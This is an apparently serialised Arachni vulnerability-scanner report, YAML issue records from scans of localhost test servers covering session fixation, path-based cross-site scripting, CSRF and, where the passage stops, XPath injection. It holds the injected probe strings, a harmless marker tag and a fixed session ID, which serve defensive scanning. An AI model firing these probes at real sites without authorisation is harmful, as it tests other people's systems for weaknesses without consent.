    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: blah=blah1;blah2=blah2;session=blah
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Set-Cookie: session=_arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1; domain=localhost; path=/; HttpOnly
        Content-Length: "76"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: _arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: SessionFixation
    method: GET
    mod_name: Session fixation
    name: Session fixation
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :injected_orig: _arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :altered: input
      :element: form
      :params: 
        input: _arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: _arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        input: _arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:9008/form/straight
      :regexp: ""
    references: 
      OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation
    regexp: ""
    regexp_match: 
    response: _arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    severity: High
    tags: 
    - session
    - cookie
    - injection
    - fixation
    - hijacking
    url: http://localhost:9008/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "384"
  cwe_url: http://cwe.mitre.org/data/definitions/384.html
  description: The web application allows the session ID to be fixed by a 3rd party.
  elem: form
  internal_modname: SessionFixation
  method: GET
  mod_name: Session fixation
  name: Session fixation
  references: 
    OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation
  severity: High
  tags: 
  - session
  - cookie
  - injection
  - fixation
  - hijacking
  url: http://localhost:9008/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "384"
    cwe_url: http://cwe.mitre.org/data/definitions/384.html
    description: The web application allows the session ID to be fixed by a 3rd party.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: blah=blah1;blah2=blah2;session=blah
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Set-Cookie: session=_arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1; domain=localhost; path=/; HttpOnly
        Content-Length: "76"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: default_arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: SessionFixation
    method: GET
    mod_name: Session fixation
    name: Session fixation
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :injected_orig: _arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :altered: input
      :element: form
      :params: 
        input: default_arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: default_arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        input: default_arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:9008/form/append
      :regexp: ""
    references: 
      OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation
    regexp: ""
    regexp_match: 
    response: _arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    severity: High
    tags: 
    - session
    - cookie
    - injection
    - fixation
    - hijacking
    url: http://localhost:9008/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "384"
  cwe_url: http://cwe.mitre.org/data/definitions/384.html
  description: The web application allows the session ID to be fixed by a 3rd party.
  elem: link
  internal_modname: SessionFixation
  method: GET
  mod_name: Session fixation
  name: Session fixation
  references: 
    OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation
  severity: High
  tags: 
  - session
  - cookie
  - injection
  - fixation
  - hijacking
  url: http://localhost:9008/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "384"
    cwe_url: http://cwe.mitre.org/data/definitions/384.html
    description: The web application allows the session ID to be fixed by a 3rd party.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: blah=blah1;blah2=blah2;session=blah
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Set-Cookie: session=_arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1; domain=localhost; path=/; HttpOnly
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: _arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: SessionFixation
    method: GET
    mod_name: Session fixation
    name: Session fixation
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :injected_orig: _arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :altered: input
      :element: link
      :params: 
        input: _arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: _arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        input: _arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:9008/link/straight?input=default
      :regexp: ""
    references: 
      OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation
    regexp: ""
    regexp_match: 
    response: ""
    severity: High
    tags: 
    - session
    - cookie
    - injection
    - fixation
    - hijacking
    url: http://localhost:9008/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "384"
  cwe_url: http://cwe.mitre.org/data/definitions/384.html
  description: The web application allows the session ID to be fixed by a 3rd party.
  elem: link
  internal_modname: SessionFixation
  method: GET
  mod_name: Session fixation
  name: Session fixation
  references: 
    OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation
  severity: High
  tags: 
  - session
  - cookie
  - injection
  - fixation
  - hijacking
  url: http://localhost:9008/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "384"
    cwe_url: http://cwe.mitre.org/data/definitions/384.html
    description: The web application allows the session ID to be fixed by a 3rd party.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: blah=blah1;blah2=blah2;session=blah
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Set-Cookie: session=_arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1; domain=localhost; path=/; HttpOnly
        Content-Length: "76"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: default_arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: SessionFixation
    method: GET
    mod_name: Session fixation
    name: Session fixation
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :injected_orig: _arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :altered: input
      :element: link
      :params: 
        input: default_arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: default_arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        input: default_arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:9008/link/append?input=default
      :regexp: ""
    references: 
      OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation
    regexp: ""
    regexp_match: 
    response: _arachni_sf_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    severity: High
    tags: 
    - session
    - cookie
    - injection
    - fixation
    - hijacking
    url: http://localhost:9008/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Client-side code, like JavaScript, can
        be injected into the web application.
  elem: path
  internal_modname: XSSPath
  method: GET
  mod_name: XSSPath
  name: Cross-Site Scripting (XSS) in path
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    Path must be validated and filtered
                        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - path
  - injection
  - regexp
  url: http://localhost:10965/%3Cmy_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/%3E
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Client-side code, like JavaScript, can
          be injected into the web application.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "75"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: <my_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
    internal_modname: XSSPath
    method: GET
    mod_name: XSSPath
    name: Cross-Site Scripting (XSS) in path
    opts: 
      :element: path
      :injected: <my_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      Path must be validated and filtered
                          before being returned as part of the HTML code of a page.
    response: /<my_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
    severity: High
    tags: 
    - xss
    - path
    - injection
    - regexp
    url: http://localhost:10965/%3Cmy_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/%3E
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Client-side code, like JavaScript, can
        be injected into the web application.
  elem: path
  internal_modname: XSSPath
  method: GET
  mod_name: XSSPath
  name: Cross-Site Scripting (XSS) in path
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    Path must be validated and filtered
                        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - path
  - injection
  - regexp
  url: http://localhost:10965/form_action1/%3E%22'%3E%3Cmy_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/%3E
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Client-side code, like JavaScript, can
          be injected into the web application.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "182"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: ">\"'><my_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>"
    internal_modname: XSSPath
    method: GET
    mod_name: XSSPath
    name: Cross-Site Scripting (XSS) in path
    opts: 
      :element: path
      :injected: ">\"'><my_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>"
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      Path must be validated and filtered
                          before being returned as part of the HTML code of a page.
    response: "        <form action=/form_action1/>\"'><my_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>>\n            <input name='input' value='default' />\n        </form>\n"
    severity: High
    tags: 
    - xss
    - path
    - injection
    - regexp
    url: http://localhost:10965/form_action1/%3E%22'%3E%3Cmy_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/%3E
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Client-side code, like JavaScript, can
        be injected into the web application.
  elem: path
  internal_modname: XSSPath
  method: GET
  mod_name: XSSPath
  name: Cross-Site Scripting (XSS) in path
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    Path must be validated and filtered
                        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - path
  - injection
  - regexp
  url: http://localhost:10965/form_action2/%3E%22'%3E%3Cmy_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/%3E
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Client-side code, like JavaScript, can
          be injected into the web application.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "184"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: ">\"'><my_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>"
    internal_modname: XSSPath
    method: GET
    mod_name: XSSPath
    name: Cross-Site Scripting (XSS) in path
    opts: 
      :element: path
      :injected: ">\"'><my_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>"
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      Path must be validated and filtered
                          before being returned as part of the HTML code of a page.
    response: "        <form action='/form_action2/>\"'><my_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>'>\n            <input name='input' value='default' />\n        </form>\n"
    severity: High
    tags: 
    - xss
    - path
    - injection
    - regexp
    url: http://localhost:10965/form_action2/%3E%22'%3E%3Cmy_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/%3E
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Client-side code, like JavaScript, can
        be injected into the web application.
  elem: path
  internal_modname: XSSPath
  method: GET
  mod_name: XSSPath
  name: Cross-Site Scripting (XSS) in path
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    Path must be validated and filtered
                        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - path
  - injection
  - regexp
  url: http://localhost:10965/form_action3/%3E%22'%3E%3Cmy_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/%3E
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Client-side code, like JavaScript, can
          be injected into the web application.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "184"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: ">\"'><my_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>"
    internal_modname: XSSPath
    method: GET
    mod_name: XSSPath
    name: Cross-Site Scripting (XSS) in path
    opts: 
      :element: path
      :injected: ">\"'><my_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>"
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      Path must be validated and filtered
                          before being returned as part of the HTML code of a page.
    response: "        <form action=\"/form_action3/>\"'><my_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>\">\n            <input name='input' value='default' />\n        </form>\n"
    severity: High
    tags: 
    - xss
    - path
    - injection
    - regexp
    url: http://localhost:10965/form_action3/%3E%22'%3E%3Cmy_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/%3E
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Client-side code, like JavaScript, can
        be injected into the web application.
  elem: path
  internal_modname: XSSPath
  method: GET
  mod_name: XSSPath
  name: Cross-Site Scripting (XSS) in path
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    Path must be validated and filtered
                        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - path
  - injection
  - regexp
  url: http://localhost:10965/query/?%3Cmy_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/%3E=
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Client-side code, like JavaScript, can
          be injected into the web application.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "75"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: ""
    internal_modname: XSSPath
    method: GET
    mod_name: XSSPath
    name: Cross-Site Scripting (XSS) in path
    opts: 
      :element: path
      :injected: ""
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      Path must be validated and filtered
                          before being returned as part of the HTML code of a page.
    response: <my_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>=
    severity: High
    tags: 
    - xss
    - path
    - injection
    - regexp
    url: http://localhost:10965/query/?%3Cmy_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/%3E=
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: ""
  cwe: "352"
  cwe_url: http://cwe.mitre.org/data/definitions/352.html
  description: |-
    The web application does not, or can not,
         sufficiently verify whether a well-formed, valid, consistent
         request was intentionally provided by the user who submitted the request.
         This is due to a lack of secure anti-CSRF tokens to verify
         the freshness of the submitted data.
  elem: form
  internal_modname: CSRF
  method: GET
  mod_name: CSRF
  name: Cross-Site Request Forgery
  references: 
    Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
    OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
    CGI Security: http://www.cgisecurity.com/csrf-faq.html
  remedy_code: ""
  remedy_guidance: |-
    A unique token that guaranties freshness of submitted
        data must be added to all web application elements that can affect
        business logic.
  severity: High
  tags: 
  - csrf
  - rdiff
  - form
  - token
  url: http://localhost:6629/
  var: insecure_important_form
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: ""
    cwe: "352"
    cwe_url: http://cwe.mitre.org/data/definitions/352.html
    description: |-
      The web application does not, or can not,
           sufficiently verify whether a well-formed, valid, consistent
           request was intentionally provided by the user who submitted the request.
           This is due to a lack of secure anti-CSRF tokens to verify
           the freshness of the submitted data.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: logged_in=true
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "463"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: CSRF
    method: GET
    mod_name: CSRF
    name: Cross-Site Request Forgery
    opts: 
      :var: insecure_important_form
      :elem: form
      :regexp: ""
    references: 
      Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
      OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
      CGI Security: http://www.cgisecurity.com/csrf-faq.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      A unique token that guaranties freshness of submitted
          data must be added to all web application elements that can affect
          business logic.
    response: "        <form name='search' action='?'>\n            <input name='q' />\n        </form>\n        <form name='insecure_important_form' action='?'>\n            <input name='hooa!' value='important stuff' />\n        </form>\n\n        <form name='secure_important_form' action='?'>\n            <input name='booya!' value='other important stuff' />\n            <input type='hidden' name='my_kewl_token' value='da39a3ee5e6b4b0d3255bfef95601890afd80709' />\n        </form>\n"
    severity: High
    tags: 
    - csrf
    - rdiff
    - form
    - token
    url: http://localhost:6629/
    var: insecure_important_form
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: ""
  cwe: "352"
  cwe_url: http://cwe.mitre.org/data/definitions/352.html
  description: |-
    The web application does not, or can not,
         sufficiently verify whether a well-formed, valid, consistent
         request was intentionally provided by the user who submitted the request.
         This is due to a lack of secure anti-CSRF tokens to verify
         the freshness of the submitted data.
  elem: form
  internal_modname: CSRF
  method: GET
  mod_name: CSRF
  name: Cross-Site Request Forgery
  references: 
    Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
    OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
    CGI Security: http://www.cgisecurity.com/csrf-faq.html
  remedy_code: ""
  remedy_guidance: |-
    A unique token that guaranties freshness of submitted
        data must be added to all web application elements that can affect
        business logic.
  severity: High
  tags: 
  - csrf
  - rdiff
  - form
  - token
  url: http://localhost:6629/token_in_name
  var: insecure_important_form
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: ""
    cwe: "352"
    cwe_url: http://cwe.mitre.org/data/definitions/352.html
    description: |-
      The web application does not, or can not,
           sufficiently verify whether a well-formed, valid, consistent
           request was intentionally provided by the user who submitted the request.
           This is due to a lack of secure anti-CSRF tokens to verify
           the freshness of the submitted data.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: logged_in=true
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "442"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: CSRF
    method: GET
    mod_name: CSRF
    name: Cross-Site Request Forgery
    opts: 
      :var: insecure_important_form
      :elem: form
      :regexp: ""
    references: 
      Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
      OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
      CGI Security: http://www.cgisecurity.com/csrf-faq.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      A unique token that guaranties freshness of submitted
          data must be added to all web application elements that can affect
          business logic.
    response: "        <form name='search' action='?'>\n            <input name='q' />\n        </form>\n        <form name='insecure_important_form' action='?'>\n            <input name='hooa!' value='important stuff' />\n        </form>\n\n        <form name='secure_important_form' action='?'>\n            <input name='booya!' value='other important stuff' />\n            <input type='hidden' name='da39a3ee5e6b4b0d3255bfef95601890afd80709' />\n        </form>\n\n"
    severity: High
    tags: 
    - csrf
    - rdiff
    - form
    - token
    url: http://localhost:6629/token_in_name
    var: insecure_important_form
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: ""
  cwe: "352"
  cwe_url: http://cwe.mitre.org/data/definitions/352.html
  description: |-
    The web application does not, or can not,
         sufficiently verify whether a well-formed, valid, consistent
         request was intentionally provided by the user who submitted the request.
         This is due to a lack of secure anti-CSRF tokens to verify
         the freshness of the submitted data.
  elem: form
  internal_modname: CSRF
  method: GET
  mod_name: CSRF
  name: Cross-Site Request Forgery
  references: 
    Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
    OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
    CGI Security: http://www.cgisecurity.com/csrf-faq.html
  remedy_code: ""
  remedy_guidance: |-
    A unique token that guaranties freshness of submitted
        data must be added to all web application elements that can affect
        business logic.
  severity: High
  tags: 
  - csrf
  - rdiff
  - form
  - token
  url: http://localhost:6629/token_in_action
  var: insecure_important_form
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: ""
    cwe: "352"
    cwe_url: http://cwe.mitre.org/data/definitions/352.html
    description: |-
      The web application does not, or can not,
           sufficiently verify whether a well-formed, valid, consistent
           request was intentionally provided by the user who submitted the request.
           This is due to a lack of secure anti-CSRF tokens to verify
           the freshness of the submitted data.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: logged_in=true
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "766"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: CSRF
    method: GET
    mod_name: CSRF
    name: Cross-Site Request Forgery
    opts: 
      :var: insecure_important_form
      :elem: form
      :regexp: ""
    references: 
      Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery
      OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
      CGI Security: http://www.cgisecurity.com/csrf-faq.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      A unique token that guaranties freshness of submitted
          data must be added to all web application elements that can affect
          business logic.
    response: "        <form name='search' action='?'>\n            <input name='q' />\n        </form>\n        <form name='insecure_important_form' action='?'>\n            <input name='hooa!' value='important stuff' />\n        </form>\n\n        <form name='secure_important_form' action='?da39a3ee5e6b4b0d3255bfef95601890afd80709'>\n            <input name='booya!' value='other important stuff' />\n        </form>\n\n        <form name='secure_important_form2' action='?da39a3ee5e6b4b0d3255bfef95601890afd80709=test'>\n            <input name='booya!' value='other important stuff' />\n        </form>\n\n        <form name='secure_important_form3' action='?test=da39a3ee5e6b4b0d3255bfef95601890afd80709'>\n            <input name='booya!' value='other important stuff' />\n        </form>\n\n"
    severity: High
    tags: 
    - csrf
    - rdiff
    - form
    - token
    url: http://localhost:6629/token_in_action
    var: insecure_important_form
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: form
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/general/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
